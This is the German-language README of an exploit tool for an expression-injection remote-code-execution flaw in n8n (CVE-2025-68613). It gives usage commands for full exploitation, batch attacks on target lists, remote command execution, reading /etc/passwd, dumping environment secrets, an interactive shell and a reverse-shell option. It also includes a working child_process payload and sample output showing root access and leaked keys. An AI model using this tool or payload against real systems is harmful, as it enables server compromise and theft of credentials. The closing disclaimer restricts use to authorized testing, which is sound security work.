n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow-Automatisierung Remote-Code-Ausführung
n8n God Mode Ultimate ist ein umfassendes Sicherheitstest-Framework, das entwickelt wurde, um CVE-2025-68613 in n8n Workflow-Automatisierungsplattformen zu erkennen und zu validieren. Diese kritische Remote-Code-Ausführungsschwachstelle (RCE) betrifft n8n-Versionen durch Expression-Injection in Workflow-Ausführungskontexten.
Betroffene Versionen:
Gepatchte Versionen:
--detect - Nur Versionserkennung (schnellste, nicht intrusiv)--safe - Sicherer Schwachstellencheck ohne Ausnutzung--poc - RCE Proof-of-Concept-Validierung--exploit - Vollständiger Exploitation-Modusread <datei> - Remote-Dateien lesenwrite <datei> <inhalt> - Dateien auf das Ziel schreiben# Python 3.8 or higher
python3 --version
# pip package manager
pip3 --version
# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Install required packages
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Display help menu
python3 n8n-godmode-ultimate.py -h
# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect
# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password
# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password
# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password
# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --cmd "whoami"
# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --read-file "/etc/passwd"
# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"
# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --dump-env
# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --shell
# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20
# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10
targets.txt Format:
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org
Sobald Sie sich im Shell-Modus (--shell) befinden:
n8n> whoami # Execute command
n8n> read /etc/passwd # Read file
n8n> env # Show environment variables
n8n> info # System information
n8n> history # Command history
n8n> exit # Exit shell
-u, --url URL Ziel-n8n-URL
-l, --list FILE Datei mit Ziel-URLs
-t, --threads NUM Anzahl der Threads für Batch-Scanning (Standard: 10)
-e, --email EMAIL n8n-Benutzer-E-Mail
-p, --password PASS n8n-Benutzer-Passwort
--detect Nur Versionserkennung (schnellste)
--safe Sicherer Check ohne Ausnutzung
--poc RCE Proof-of-Concept
--exploit Vollständiger Exploitation-Modus
--god God-Mode aktivieren
--cmd COMMAND Einzelnen Befehl ausführen
--read-file PATH Remote-Datei lesen
--write-file PATH Remote-Datei schreiben
--content DATA Inhalt für Schreiboperation
--dump-env Alle Umgebungsvariablen extrahieren
--shell Interaktiver Shell-Modus
--revshell HOST:PORT Reverse-Shell-Payload
--mode MODE Exploit-Modus: schedule|webhook|code|expression (Standard: schedule)
--timeout SEC Befehls-Timeout in Sekunden (Standard: 30)
--cleanup Workflows nach Ausführung löschen
-k, --insecure SSL-Verifikation deaktivieren
-v, --verbose Ausführliche Ausgabe
-q, --quiet Minimale Ausgabe
Erstellt einen Workflow mit einem geplanten Trigger, der alle 3 Sekunden automatisch ausgeführt wird. Zuverlässigste Methode.
Payload: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}
Erstellt einen HTTP-Webhook-Endpunkt, der bei Auslösung Befehle ausführt.
Injiziert Code direkt in einen Code-Node mit child_process-Zugriff.
Manuelle Ausführung über das Expressionsauswertungssystem von n8n.
Extrahiert die Version aus der base64-kodierten Sentry-Konfiguration auf der Anmeldeseite:
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />
/rest/login - Authentifizierung/rest/workflows - Workflow-CRUD-Operationen/rest/credentials - Credential-Enumeration/rest/executions - Abruf von Ausführungsprotokollen/rest/users - Benutzerenumeration/rest/settings - Systemkonfiguration[*] n8n God Mode Ultimate v1.0.0
[*] Ziel: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VERWUNDBAR (< 1.120.4)
[*] Authentifizierung erfolgreich
[*] Erstelle Exploitation-Workflow...
[*] Workflow-ID: hd6LxSY765WBThqd
[*] Führe Befehl aus: whoami
[✓] Befehl erfolgreich ausgeführt!
[+] Ausgabe: root
n8n> whoami
[+] root
n8n> read /etc/hostname
[+] n8n-production-server
n8n> env
[+] Umgebungsvariablen:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...
NUR FÜR AUTORISIERTE SICHERHEITSTESTS
Dieses Tool wird zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Benutzer müssen alle geltenden Gesetze und Vorschriften einhalten.
SIE MÜSSEN:
SIE DÜRFEN NICHT:
Der Autor übernimmt KEINE Verantwortung für Missbrauch dieses Tools. Unbefugter Zugriff auf Computersysteme ist illegal gemäß:
Nutzung auf eigene Gefahr. Sie sind für Ihre Handlungen verantwortlich.
Beiträge sind willkommen! Bitte befolgen Sie diese Richtlinien:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)Satyam Rastogi
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.
MIT-Lizenz
Copyright (c) 2025 Satyam Rastogi
Hiermit wird jeder Person, die eine Kopie dieser Software und der zugehörigen Dokumentationsdateien (die "Software") erhält, kostenlos die Erlaubnis erteilt, die Software ohne Einschränkung zu nutzen, einschließlich und ohne Einschränkung der Rechte zur Nutzung, Vervielfältigung, Änderung, Zusammenführung, Veröffentlichung, Verteilung, Unterlizenzierung und/oder zum Verkauf von Kopien der Software, und Personen, denen die Software zur Verfügung gestellt wird, dies unter den folgenden Bedingungen zu gestatten:
Der obige Urheberrechtshinweis und dieser Genehmigungshinweis müssen in allen Kopien oder wesentlichen Teilen der Software enthalten sein.
DIE SOFTWARE WIRD "WIE BESEHEN" ZUR VERFÜGUNG GESTELLT, OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER.
Für Sicherheitsprobleme melden Sie sich bitte verantwortungsbewusst:
⭐ Vergib einen Stern für dieses Repository, wenn du es nützlich fandest!
Gemacht mit 💻 von Sicherheitsforschern, für Sicherheitsforscher